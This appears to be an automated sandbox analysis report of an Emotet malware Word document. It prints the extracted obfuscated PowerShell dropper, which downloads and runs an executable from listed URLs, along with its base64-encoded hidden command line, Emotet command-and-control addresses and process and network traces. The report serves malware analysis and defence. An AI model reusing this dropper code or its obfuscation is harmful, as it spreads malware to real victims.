Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    18-12-2019 18:25

General

  • Target

    8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75

  • Sample

    191218-2q4bex5dys

  • SHA256

    8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Bwlbjjmjzv='Itmpmrnhllu';$Viiigpzeesv = '873';$Njstbhluo='Ureafvntsxwno';$Kdqglwao=$env:userprofile+'\'+$Viiigpzeesv+'.exe';$Hrypcpub='Qfuifoed';$Mkxtjiarr=.('new-obj'+'ec'+'t') Net.weBClieNt;$Vgxpramjsb='http://moisesdavid.com/qoong/vy/*http://insurancebabu.com/wp-admin/iXElcu9f/*http://rishi99.com/framework.impossible/dhADGeie6/*https://www.alertpage.net/confirmation/2nX/*https://anttarc.org/chartaxd/DMBuiwf5u/'."SPl`iT"('*');$Aigfqhdpkrwe='Zuwzhkaq';foreach($Cuzhdfqocjwx in $Vgxpramjsb){try{$Mkxtjiarr."D`OwN`lOADfiLE"($Cuzhdfqocjwx, $Kdqglwao);$Opskmjrjyaazl='Uleqfgmetjkrf';If ((&('Get-I'+'t'+'em') $Kdqglwao)."l`E`Ngth" -ge 36977) {[Diagnostics.Process]::"STA`RT"($Kdqglwao);$Kairapscbzm='Zzjeamzw';break;$Rblybcrl='Jqzcayfscpft'}}catch{}}$Ujbnfjfu='Qqpqrajnzksja'
URLs
exe.dropper

http://moisesdavid.com/qoong/vy/

exe.dropper

http://insurancebabu.com/wp-admin/iXElcu9f/

exe.dropper

http://rishi99.com/framework.impossible/dhADGeie6/

exe.dropper

https://www.alertpage.net/confirmation/2nX/

exe.dropper

https://anttarc.org/chartaxd/DMBuiwf5u/

Extracted

Family

emotet

C2

1.215.28.101:8080

184.167.148.162:80

66.25.34.20:80

165.227.156.155:443

167.99.105.223:7080

67.225.179.64:8080

176.31.200.130:8080

190.220.19.82:443

91.242.138.5:443

159.65.25.128:8080

61.197.110.214:80

110.143.84.202:80

95.128.43.213:8080

91.73.197.90:80

201.184.105.242:443

108.179.206.219:8080

181.57.193.14:80

188.152.7.140:80

139.130.241.252:443

197.254.221.174:80

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
3
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
4
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4976
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABCAHcAbABiAGoAagBtAGoAegB2AD0AJwBJAHQAbQBwAG0AcgBuAGgAbABsAHUAJwA7ACQAVgBpAGkAaQBnAHAAegBlAGUAcwB2ACAAPQAgACcAOAA3ADMAJwA7ACQATgBqAHMAdABiAGgAbAB1AG8APQAnAFUAcgBlAGEAZgB2AG4AdABzAHgAdwBuAG8AJwA7ACQASwBkAHEAZwBsAHcAYQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGkAaQBpAGcAcAB6AGUAZQBzAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAHkAcABjAHAAdQBiAD0AJwBRAGYAdQBpAGYAbwBlAGQAJwA7ACQATQBrAHgAdABqAGkAYQByAHIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAOwAkAFYAZwB4AHAAcgBhAG0AagBzAGIAPQAnAGgAdAB0AHAAOgAvAC8AbQBvAGkAcwBlAHMAZABhAHYAaQBkAC4AYwBvAG0ALwBxAG8AbwBuAGcALwB2AHkALwAqAGgAdAB0AHAAOgAvAC8AaQBuAHMAdQByAGEAbgBjAGUAYgBhAGIAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBYAEUAbABjAHUAOQBmAC8AKgBoAHQAdABwADoALwAvAHIAaQBzAGgAaQA5ADkALgBjAG8AbQAvAGYAcgBhAG0AZQB3AG8AcgBrAC4AaQBtAHAAbwBzAHMAaQBiAGwAZQAvAGQAaABBAEQARwBlAGkAZQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGwAZQByAHQAcABhAGcAZQAuAG4AZQB0AC8AYwBvAG4AZgBpAHIAbQBhAHQAaQBvAG4ALwAyAG4AWAAvACoAaAB0AHQAcABzADoALwAvAGEAbgB0AHQAYQByAGMALgBvAHIAZwAvAGMAaABhAHIAdABhAHgAZAAvAEQATQBCAHUAaQB3AGYANQB1AC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAEEAaQBnAGYAcQBoAGQAcABrAHIAdwBlAD0AJwBaAHUAdwB6AGgAawBhAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAdQB6AGgAZABmAHEAbwBjAGoAdwB4ACAAaQBuACAAJABWAGcAeABwAHIAYQBtAGoAcwBiACkAewB0AHIAeQB7ACQATQBrAHgAdABqAGkAYQByAHIALgAiAEQAYABPAHcATgBgAGwATwBBAEQAZgBpAEwARQAiACgAJABDAHUAegBoAGQAZgBxAG8AYwBqAHcAeAAsACAAJABLAGQAcQBnAGwAdwBhAG8AKQA7ACQATwBwAHMAawBtAGoAcgBqAHkAYQBhAHoAbAA9ACcAVQBsAGUAcQBmAGcAbQBlAHQAagBrAHIAZgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEsAZABxAGcAbAB3AGEAbwApAC4AIgBsAGAARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA2ADkANwA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgBUACIAKAAkAEsAZABxAGcAbAB3AGEAbwApADsAJABLAGEAaQByAGEAcABzAGMAYgB6AG0APQAnAFoAegBqAGUAYQBtAHoAdwAnADsAYgByAGUAYQBrADsAJABSAGIAbAB5AGIAYwByAGwAPQAnAEoAcQB6AGMAYQB5AGYAcwBjAHAAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAagBiAG4AZgBqAGYAdQA9ACcAUQBxAHAAcQByAGEAagBuAHoAawBzAGoAYQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4696
    • C:\Users\Admin\873.exe
      "C:\Users\Admin\873.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4440
      • C:\Users\Admin\873.exe
        --30b98952
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4412

Network

  • 104.24.115.19:80
    moisesdavid.com
    Powershell.exe
  • 104.24.115.19:443
    moisesdavid.com
    Powershell.exe
  • 10.10.0.255:137
  • 8.8.8.8:53
    moisesdavid.com

    DNS Request

    moisesdavid.com

    DNS Response

    104.24.115.19
    104.24.114.19

  • 10.10.0.11:137
  • 10.10.0.40:137
  • 224.0.0.22

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4412-12-0x0000000000760000-0x0000000000777000-memory.dmp

    Filesize

    92KB

  • memory/4412-13-0x0000000000400000-0x00000000004C1000-memory.dmp

    Filesize

    772KB

  • memory/4440-10-0x0000000002100000-0x0000000002117000-memory.dmp

    Filesize

    92KB

  • memory/4976-2-0x000002466E3A7000-0x000002466E3A8000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.